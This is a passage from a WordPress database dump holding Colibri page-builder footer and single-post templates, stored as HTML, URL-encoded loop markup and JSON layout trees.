target=\"_blank\" href=\"https://colibriwp.com\" rel=\"noopener\">Colibri</a>[/colibri_copyright]</div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','footer_post','','publish','closed','closed','','28','','','2024-11-14 09:48:38','2024-11-14 14:48:38','',0,'https://gsudice.dataconn.net/?post_type=extb_post_footer&#038;p=28',0,'extb_post_footer','',0),(29,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','{\"name\":\"hop-footer\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Footers\",\"attrs\":{\"id\":\"Footers\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-copyright\",\"slot\":null,\"parentId\":\"28-f4\",\"index\":0,\"id\":\"28-f5\",\"partialId\":28,\"styleRef\":270,\"type\":\"footer\"}],\"id\":\"28-f4\",\"parentId\":\"28-f3\",\"partialId\":28,\"styleRef\":269,\"type\":\"footer\"}],\"parentId\":\"28-f2\",\"index\":0,\"id\":\"28-f3\",\"partialId\":28,\"styleRef\":268,\"type\":\"footer\"}],\"id\":\"28-f2\",\"parentId\":\"28-f1\",\"partialId\":28,\"styleRef\":267,\"type\":\"footer\"}],\"id\":\"28-f1\",\"ui\":{\"isSelected\":false,\"isHovered\":false},\"type\":\"footer\",\"partialId\":28,\"styleRef\":266}','','','publish','closed','closed','','29','','','2024-11-14 09:48:38','2024-11-14 14:48:38','',0,'https://gsudice.dataconn.net/?post_type=extb_post_json&#038;p=29',0,'extb_post_json','',0),(31,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','<div data-colibri-id=\"31-m1\" class=\"style-66 style-local-31-m1 h-overflow-hidden position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"31-m2\" id=\"blog-post\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-67 style-local-31-m2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"31-m3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 colibri-dynamic-list colibri-single-post-loop style-72 style-local-31-m3 position-relative\">\n        <!---->\n        <div data-colibri-component=\"\" class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <!---->[colibri_loop]%5Bcolibri_item_template%5D%0A%20%20%20%20%20%20%20%20%3Cdiv%20%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-12%20h-col-md-12%20h-col-12%20%5Bcolibri_post_class%5D%20masonry-item%20style-73-outer%20style-local-31-m4-outer%22%20%20%3E%3Cdiv%20%20%20data-colibri-id=%2231-m4%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-73%20style-local-31-m4%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20%20data-colibri-id=%2231-m5%22%20class=%22colibri-post-thumbnail%20%5Bcolibri_post_thumbnail_classes%5D%20style-74%20style-local-31-m5%20h-overflow-hidden%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20%20class=%22h-global-transition-all%20colibri-post-thumbnail-shortcode%20style-dynamic-31-m5-height%22%3E%5Bcolibri_post_thumbnail%20link=%22false%22%5D%3C/div%3E%20%3Cdiv%20%20class=%22colibri-post-thumbnail-content%20align-items-lg-center%20align-items-md-center%20align-items-center%20flex-basis-100%22%3E%3Cdiv%20%20class=%22w-100%20h-y-container%22%3E%3C!----%3E%20%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%2231-m6%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-75%20style-local-31-m6%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-76-outer%20style-local-31-m7-outer%22%20%20%3E%3Cdiv%20%20data-colibri-id=%2231-m7%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-3%20h-px-md-3%20h-px-3%20v-inner-lg-3%20v-inner-md-3%20v-inner-3%20style-76%20style-local-31-m7%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%2231-m8%22%20class=%22h-blog-meta%20style-77%20style-local-31-m8%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20name=%221%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eby%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_author_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_author_content%5D%3C/a%3E%20%3Cspan%20class=%22meta-separator%22%3E%3C/span%3E%3C/div%3E%3Cdiv%20name=%222%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eon%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_date_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_date_content%20date_format=%22F%20j,%20Y%22%5D%3C/a%3E%3C/div%3E%3C!----%3E%3C!----%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%2231-m9%22%20class=%22style-78%20style-local-31-m9%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22colibri-post-content%20h-global-transition-all%22%3E%5Bcolibri_post_content%5D%3C/div%3E%3C/div%3E%5Bcolibri_layout_wrapper%20name=%22categories_container%22%5D%3Cdiv%20%20%20%20data-colibri-id=%2231-m10%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-79%20style-local-31-m10%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-80-outer%20style-local-31-m11-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%2231-m11%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-80%20style-local-31-m11%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-auto%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%2231-m12%22%20class=%22h-text%20h-text-component%20style-81%20style-local-31-m12%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22%22%3E%3Cp%3ECategories:%3C/p%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg%20h-col-md%20h-col%20style-82-outer%20style-local-31-m13-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%2231-m13%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-82%20style-local-31-m13%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%2231-m14%22%20class=%22h-blog-categories%20style-83%20style-local-31-m14%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_categories%20prefix=%22%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5B/colibri_layout_wrapper%5D%5Bcolibri_layout_wrapper%20name=%22tags_container%22%5D%3Cdiv%20%20%20%20data-colibri-id=%2231-m15%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-84%20style-local-31-m15%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-center%20align-items-md-center%20align-items-center%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20align-self-lg-center%20align-self-md-center%20align-self-center%20style-85-outer%20style-local-31-m16-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%2231-m16%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-85%20style-local-31-m16%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-auto%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%2231-m17%22%20class=%22h-text%20h-text-component%20style-86%20style-local-31-m17%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22%22%3E%3Cp%3ETags:%3C/p%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg%20h-col-md%20h-col%20align-self-lg-center%20align-self-md-center%20align-self-center%20style-87-outer%20style-local-31-m18-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%2231-m18%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-87%20style-local-31-m18%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%2231-m19%22%20class=%22h-blog-tags%20empty-preview%20style-88%20style-local-31-m19%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_tags%20prefix=%22%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5B/colibri_layout_wrapper%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5Bcolibri_layout_wrapper%20name=%22navigation_container%22%5D%3Cdiv%20%20%20%20data-colibri-id=%2231-m20%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-89%20style-local-31-m20%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-90-outer%20style-local-31-m21-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%2231-m21%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-2%20v-inner-md-2%20v-inner-2%20style-90%20style-local-31-m21%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%2231-m22%22%20class=%22post-nav-button%20hide-title%20style-91%20style-local-31-m22%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_nav_button%20type=%22prev%22%20prev_post=%22Previous%20post%22%20next_post=%22Next%20post:%22%20show_title=%22false%22%20title_length=%2240%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-92-outer%20style-local-31-m23-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%2231-m23%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-2%20v-inner-md-2%20v-inner-2%20style-92%20style-local-31-m23%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%2231-m24%22%20class=%22post-nav-button%20hide-title%20style-93%20style-local-31-m24%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_nav_button%20type=%22next%22%20prev_post=%22Previous%20post:%22%20next_post=%22Next%20post%22%20show_title=%22false%22%20title_length=%2230%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5B/colibri_layout_wrapper%5D%3C/div%3E%3C/div%3E%3C/div%3E%0A%20%20%20%20%20%20%5B/colibri_item_template%5D%0A%20%20%20%20%20%20[/colibri_loop]\n          </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"31-m29\" id=\"comments\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-94 style-local-31-m29 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"31-m30\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-99 style-local-31-m30 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-100-outer style-local-31-m31-outer\">\n            <div data-colibri-id=\"31-m31\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-100 style-local-31-m31 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"31-m32\" class=\"style-101 style-local-31-m32 position-relative\">\n                  <!---->\n                  <div class=\"h-global-transition-all blog-post-comments\">[colibri_post_comments none=\"No responses yet\" one=\"One response\" multiple=\"{COMMENTS-COUNT} Responses\" disabled=\"Comments are closed\" avatar_size=\"30\"]</div>\n                </div>\n                <div data-colibri-id=\"31-m33\" class=\"position-relative\">\n                  <!---->\n                  <div class=\"h-global-transition-all\">[colibri_post_comment_form]</div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','main_post','','publish','closed','closed','','31','','','2022-02-15 15:45:54','2022-02-15 15:45:54','',0,'https://gsudice.dataconn.net/?post_type=extb_post_main&#038;p=31',0,'extb_post_main','',0),(32,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','{\"name\":\"hop-main\",\"children\":[{\"name\":\"hop-section\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"id\":\"31-m27\",\"parentId\":\"31-m26\",\"partialId\":31,\"styleRef\":70,\"type\":\"main\"},{\"name\":\"hop-text\",\"id\":\"31-m28\",\"parentId\":\"31-m26\",\"partialId\":31,\"styleRef\":71,\"type\":\"main\"}],\"id\":\"31-m26\",\"parentId\":\"31-m25\",\"partialId\":31,\"styleRef\":69,\"type\":\"main\"}],\"id\":\"31-m25\",\"parentId\":\"31-m2\",\"partialId\":31,\"styleRef\":68,\"type\":\"main\"}]},\"children\":[{\"name\":\"hop-post-loop\",\"slots\":{\"item\":[{\"name\":\"hop-loop-item\",\"children\":[{\"name\":\"hop-post-thumbnail\",\"id\":\"31-m5\",\"parentId\":\"31-m4\",\"partialId\":31,\"styleRef\":74,\"type\":\"main\",\"props\":{\"showPlaceholder\":false,\"addLink\":false}},{\"name\":\"hop-row\",\"id\":\"31-m6\",\"parentId\":\"31-m4\",\"partialId\":31,\"styleRef\":75,\"type\":\"main\",\"children\":[{\"name\":\"hop-column\",\"id\":\"31-m7\",\"parentId\":\"31-m6\",\"partialId\":31,\"children\":[{\"name\":\"hop-post-meta\",\"slot\":null,\"parentId\":\"31-m7\",\"index\":1,\"id\":\"31-m8\",\"partialId\":31,\"styleRef\":77,\"type\":\"main\",\"props\":{\"metadata\":[{\"value\":\"author\",\"name\":\"Author\",\"check\":true,\"icon\":\"icons8-line-awesome\\/user\",\"id\":1,\"prefix\":\"by \"},{\"value\":\"date\",\"name\":\"Date\",\"check\":true,\"icon\":\"icons8-line-awesome\\/calendar\",\"id\":2,\"prefix\":\"on \"},{\"value\":\"time\",\"name\":\"Time\",\"check\":false,\"icon\":\"icons8-line-awesome\\/clock-o\",\"id\":3,\"prefix\":\"at \"},{\"value\":\"comments\",\"name\":\"Comments\",\"check\":false,\"icon\":\"icons8-line-awesome\\/comments\",\"id\":4,\"prefix\":\"\",\"suffix\":\"comments\"}],\"showIcons\":false,\"separator\":\"\"}},{\"name\":\"hop-post-content\",\"parentId\":\"31-m7\",\"id\":\"31-m9\",\"partialId\":31,\"styleRef\":78,\"type\":\"main\"},{\"name\":\"hop-post-categories-container\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"31-m11\",\"parentId\":\"31-m10\",\"partialId\":31,\"children\":[{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"31-m11\",\"index\":0,\"id\":\"31-m12\",\"partialId\":31,\"styleRef\":81,\"type\":\"main\",\"props\":{\"content\":\"<p>Categories:<\\/p>\"}}],\"styleRef\":80,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"id\":\"31-m13\",\"parentId\":\"31-m10\",\"partialId\":31,\"children\":[{\"name\":\"hop-post-categories\",\"slot\":null,\"parentId\":\"31-m13\",\"index\":0,\"id\":\"31-m14\",\"partialId\":31,\"styleRef\":83,\"type\":\"main\"}],\"styleRef\":82,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"31-m7\",\"index\":1,\"id\":\"31-m10\",\"partialId\":31,\"styleRef\":79,\"type\":\"main\"},{\"name\":\"hop-post-tags-container\",\"slot\":null,\"parentId\":\"31-m7\",\"index\":1,\"id\":\"31-m15\",\"partialId\":31,\"styleRef\":84,\"type\":\"main\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"31-m16\",\"parentId\":\"31-m15\",\"partialId\":31,\"children\":[{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"31-m16\",\"index\":0,\"id\":\"31-m17\",\"partialId\":31,\"styleRef\":86,\"type\":\"main\",\"props\":{\"content\":\"<p>Tags:<\\/p>\"}}],\"styleRef\":85,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"id\":\"31-m18\",\"parentId\":\"31-m15\",\"partialId\":31,\"children\":[{\"name\":\"hop-post-tags\",\"slot\":null,\"parentId\":\"31-m18\",\"index\":2,\"id\":\"31-m19\",\"partialId\":31,\"styleRef\":88,\"type\":\"main\",\"props\":{\"prefix\":\"\"}}],\"styleRef\":87,\"type\":\"main\"}]}],\"styleRef\":76,\"type\":\"main\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"tablet\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}},\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}}}],\"slot\":null,\"index\":1},{\"name\":\"hop-post-nav-container\",\"parentId\":\"31-m4\",\"id\":\"31-m20\",\"partialId\":31,\"styleRef\":89,\"type\":\"main\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"50\"}}}}}}},\"id\":\"31-m21\",\"parentId\":\"31-m20\",\"partialId\":31,\"children\":[{\"name\":\"hop-post-nav-button\",\"slot\":null,\"parentId\":\"31-m21\",\"index\":0,\"id\":\"31-m22\",\"partialId\":31,\"styleRef\":91,\"type\":\"main\",\"props\":{\"type\":\"prev\",\"showPostTitle\":false,\"prevLabel\":\"Previous post\",\"postTitleLength\":\"40\",\"stateType\":\"\"}}],\"styleRef\":90,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"50\"}}}}}}},\"id\":\"31-m23\",\"parentId\":\"31-m20\",\"partialId\":31,\"children\":[{\"name\":\"hop-post-nav-button\",\"slot\":null,\"parentId\":\"31-m23\",\"index\":0,\"id\":\"31-m24\",\"partialId\":31,\"styleRef\":93,\"type\":\"main\",\"props\":{\"nextLabel\":\"Next post\",\"showPostTitle\":false,\"stateType\":\"\"}}],\"styleRef\":92,\"type\":\"main\"}],\"slot\":null,\"index\":2}],\"id\":\"31-m4\",\"parentId\":\"31-m3\",\"partialId\":31,\"styleRef\":73,\"type\":\"main\"}]},\"slot\":null,\"parentId\":\"31-m2\",\"index\":0,\"id\":\"31-m3\",\"partialId\":31,\"styleRef\":72,\"type\":\"main\"}],\"parentId\":\"31-m1\",\"type\":\"main\",\"props\":{\"anchor\":false,\"name\":\"Blog Post\",\"attrs\":{\"id\":\"blog-post\"}},\"id\":\"31-m2\",\"partialId\":31,\"styleRef\":67},{\"name\":\"hop-section\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"id\":\"31-m36\",\"parentId\":\"31-m35\",\"partialId\":31,\"styleRef\":97,\"type\":\"main\"},{\"name\":\"hop-text\",\"id\":\"31-m37\",\"parentId\":\"31-m35\",\"partialId\":31,\"styleRef\":98,\"type\":\"main\"}],\"id\":\"31-m35\",\"parentId\":\"31-m34\",\"partialId\":31,\"styleRef\":96,\"type\":\"main\"}],\"id\":\"31-m34\",\"parentId\":\"31-m29\",\"partialId\":31,\"styleRef\":95,\"type\":\"main\"}]},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"tablet\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}},\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"id\":\"31-m31\",\"parentId\":\"31-m30\",\"partialId\":31,\"children\":[{\"name\":\"hop-post-comments\",\"slot\":null,\"parentId\":\"31-m31\",\"index\":0,\"id\":\"31-m32\",\"partialId\":31,\"styleRef\":101,\"type\":\"main\",\"props\":{\"multipleTitle\":\"{COMMENTS-COUNT} Responses\",\"avatarSize\":30,\"noneTitle\":\"No responses yet\"}},{\"name\":\"hop-post-comment-form\",\"id\":\"31-m33\",\"parentId\":\"31-m31\",\"partialId\":31,\"styleRef\":102,\"type\":\"main\"}],\"styleRef\":100,\"type\":\"main\"}],\"id\":\"31-m30\",\"parentId\":\"31-m29\",\"partialId\":31,\"styleRef\":99,\"type\":\"main\"}],\"parentId\":\"31-m1\",\"type\":\"main\",\"props\":{\"anchor\":false,\"name\":\"Comments\",\"attrs\":{\"id\":\"comments\"}},\"id\":\"31-m29\",\"partialId\":31,\"styleRef\":94}],\"id\":\"31-m1\",\"partialId\":31,\"styleRef\":66,\"type\":\"main\"}','','','publish','closed','closed','','32','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',0,'https://gsudice.dataconn.net/?post_type=extb_post_json&#038;p=32',0,'extb_post_json','',0),(33,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','<div data-colibri-id=\"31-m1\" class=\"style-66 style-local-31-m1 h-overflow-hidden position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"31-m2\" id=\"blog-post\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-67 style-local-31-m2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"31-m3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 colibri-dynamic-list colibri-single-post-loop style-72 style-local-31-m3 position-relative\">\n        <!---->\n        <div data-colibri-component=\"\" class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          